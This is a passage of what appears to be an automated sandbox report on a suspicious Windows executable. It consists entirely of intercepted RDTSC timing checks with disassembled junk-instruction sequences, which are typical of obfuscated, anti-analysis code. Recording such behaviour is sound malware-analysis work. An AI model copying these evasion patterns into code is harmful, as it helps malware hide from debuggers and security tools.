                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD06F1 second address: 4FD06F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FE0F65 second address: 4FE0F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF013C second address: 4FF0140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF0140 second address: 4FF0146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF0146 second address: 4FF015B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A781h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF015B second address: 4FF015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF015F second address: 4FF017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F8080B8A77Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF017B second address: 4FF017F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF017F second address: 4FF0185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 501063A second address: 50106A8 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c call 00007F8080FFFC69h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007F8080FFFC67h 0x0000001a jmp 00007F8080FFFC63h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8080FFFC65h 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 50106A8 second address: 50106E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8080B8A787h 0x00000009 jmp 00007F8080B8A783h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 50106E1 second address: 50106F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 50106F8 second address: 5010743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov esi, 49856D17h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ecx 0x00000011 jmp 00007F8080B8A77Ah 0x00000016 mov eax, dword ptr [76FA65FCh] 0x0000001b jmp 00007F8080B8A780h 0x00000020 test eax, eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8080B8A787h 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5010743 second address: 5010749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5010749 second address: 501074D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 501074D second address: 501077B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F80F2F12E5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8080FFFC65h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 501077B second address: 5010781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5010781 second address: 5010785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5010785 second address: 50107BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A783h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d pushad 0x0000000e mov dh, ch 0x00000010 mov cx, di 0x00000013 popad 0x00000014 xor eax, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8080B8A77Fh 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 50108B0 second address: 50108B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 50108B4 second address: 50108BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC000B second address: 4FC0010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0010 second address: 4FC0016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0016 second address: 4FC001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC001A second address: 4FC0060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov si, 8067h 0x0000000e call 00007F8080B8A77Ch 0x00000013 mov ah, 2Eh 0x00000015 pop edx 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F8080B8A77Ah 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8080B8A787h 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0060 second address: 4FC0084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0084 second address: 4FC0125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov al, 69h 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F8080B8A789h 0x00000011 adc ecx, 41EA21A6h 0x00000017 jmp 00007F8080B8A781h 0x0000001c popfd 0x0000001d popad 0x0000001e popad 0x0000001f mov dword ptr [esp], ecx 0x00000022 jmp 00007F8080B8A77Dh 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F8080B8A77Eh 0x0000002d push eax 0x0000002e pushad 0x0000002f mov ecx, edx 0x00000031 mov di, 4090h 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 mov dl, 91h 0x0000003a push eax 0x0000003b mov eax, edx 0x0000003d pop edi 0x0000003e popad 0x0000003f mov ebx, dword ptr [ebp+10h] 0x00000042 jmp 00007F8080B8A784h 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F8080B8A787h 0x0000004f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0125 second address: 4FC012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC012B second address: 4FC0145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop ebx 0x00000011 mov dl, al 0x00000013 popad 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0145 second address: 4FC0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0168 second address: 4FC016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC016C second address: 4FC0170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0170 second address: 4FC0176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0176 second address: 4FC0209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007F8080FFFC5Eh 0x00000012 mov eax, 22918321h 0x00000017 pop ecx 0x00000018 call 00007F8080FFFC67h 0x0000001d pop esi 0x0000001e popad 0x0000001f push ebp 0x00000020 pushad 0x00000021 pushad 0x00000022 push esi 0x00000023 pop ebx 0x00000024 mov ah, 2Bh 0x00000026 popad 0x00000027 mov esi, edi 0x00000029 popad 0x0000002a mov dword ptr [esp], edi 0x0000002d pushad 0x0000002e push ebx 0x0000002f pushfd 0x00000030 jmp 00007F8080FFFC68h 0x00000035 sub ecx, 585FAD78h 0x0000003b jmp 00007F8080FFFC5Bh 0x00000040 popfd 0x00000041 pop ecx 0x00000042 mov cx, bx 0x00000045 popad 0x00000046 test esi, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push esi 0x0000004c pop ebx 0x0000004d mov edi, ecx 0x0000004f popad 0x00000050 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0209 second address: 4FC020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC020F second address: 4FC0213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0213 second address: 4FC024D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A787h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F80F2AE8B5Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8080B8A785h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC024D second address: 4FC025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080FFFC5Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC025D second address: 4FC0261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0261 second address: 4FC0276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0276 second address: 4FC027A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC027A second address: 4FC0292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0292 second address: 4FC02A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A77Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC02A4 second address: 4FC02CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F80F2F5DFCCh 0x00000011 pushad 0x00000012 mov cx, C63Bh 0x00000016 mov bx, si 0x00000019 popad 0x0000001a mov edx, dword ptr [esi+44h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC02CD second address: 4FC02DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC02DC second address: 4FC035F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 mov al, 61h 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F8080FFFC5Bh 0x00000019 jmp 00007F8080FFFC63h 0x0000001e popfd 0x0000001f popad 0x00000020 test edx, 61000000h 0x00000026 jmp 00007F8080FFFC66h 0x0000002b jne 00007F80F2F5DF9Eh 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F8080FFFC67h 0x00000038 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC035F second address: 4FC03E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8080B8A77Ch 0x00000014 or si, CC68h 0x00000019 jmp 00007F8080B8A77Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 pushfd 0x00000021 jmp 00007F8080B8A77Fh 0x00000026 jmp 00007F8080B8A783h 0x0000002b popfd 0x0000002c pop esi 0x0000002d popad 0x0000002e jne 00007F80F2AE8A51h 0x00000034 jmp 00007F8080B8A77Fh 0x00000039 test bl, 00000007h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC03E4 second address: 4FC03E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC03E8 second address: 4FC0403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A787h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB06FF second address: 4FB0705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0705 second address: 4FB071B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A782h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB071B second address: 4FB0784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F8080FFFC5Bh 0x00000015 and esi, 4535AD2Eh 0x0000001b jmp 00007F8080FFFC69h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F8080FFFC60h 0x00000027 jmp 00007F8080FFFC65h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0784 second address: 4FB07E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8080B8A787h 0x00000009 or ecx, 4493789Eh 0x0000000f jmp 00007F8080B8A789h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8080B8A786h 0x00000025 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB07E0 second address: 4FB07E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB07E4 second address: 4FB07EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB07EA second address: 4FB081E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007F8080FFFC60h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8080FFFC5Ah 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB081E second address: 4FB082D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB082D second address: 4FB083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB083B second address: 4FB0842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0842 second address: 4FB0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0848 second address: 4FB084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB084C second address: 4FB086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8080FFFC5Dh 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB086F second address: 4FB0893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8080B8A787h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0893 second address: 4FB0897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0897 second address: 4FB089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB089B second address: 4FB08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB08A1 second address: 4FB08DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 jmp 00007F8080B8A780h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F8080B8A77Bh 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8080B8A785h 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB08DE second address: 4FB0930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, F602h 0x00000007 push ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, dword ptr [ebp+08h] 0x0000000f pushad 0x00000010 mov ecx, edi 0x00000012 pushfd 0x00000013 jmp 00007F8080FFFC67h 0x00000018 sbb cx, 2DAEh 0x0000001d jmp 00007F8080FFFC69h 0x00000022 popfd 0x00000023 popad 0x00000024 sub ebx, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0930 second address: 4FB0934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0934 second address: 4FB0938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0938 second address: 4FB093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB093E second address: 4FB0944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0944 second address: 4FB0948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0948 second address: 4FB0A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F8080FFFC5Fh 0x00000011 xor cl, 0000006Eh 0x00000014 jmp 00007F8080FFFC69h 0x00000019 popfd 0x0000001a pushad 0x0000001b mov eax, 7D96CECDh 0x00000020 movzx eax, di 0x00000023 popad 0x00000024 popad 0x00000025 je 00007F80F2F65659h 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F8080FFFC5Bh 0x00000032 jmp 00007F8080FFFC63h 0x00000037 popfd 0x00000038 popad 0x00000039 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000040 pushad 0x00000041 push edx 0x00000042 pushfd 0x00000043 jmp 00007F8080FFFC5Eh 0x00000048 sbb eax, 6E976178h 0x0000004e jmp 00007F8080FFFC5Bh 0x00000053 popfd 0x00000054 pop eax 0x00000055 pushfd 0x00000056 jmp 00007F8080FFFC69h 0x0000005b xor cl, 00000016h 0x0000005e jmp 00007F8080FFFC61h 0x00000063 popfd 0x00000064 popad 0x00000065 mov ecx, esi 0x00000067 jmp 00007F8080FFFC5Eh 0x0000006c je 00007F80F2F655DBh 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007F8080FFFC67h 0x00000079 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0A3D second address: 4FB0A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FA6968h], 00000002h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
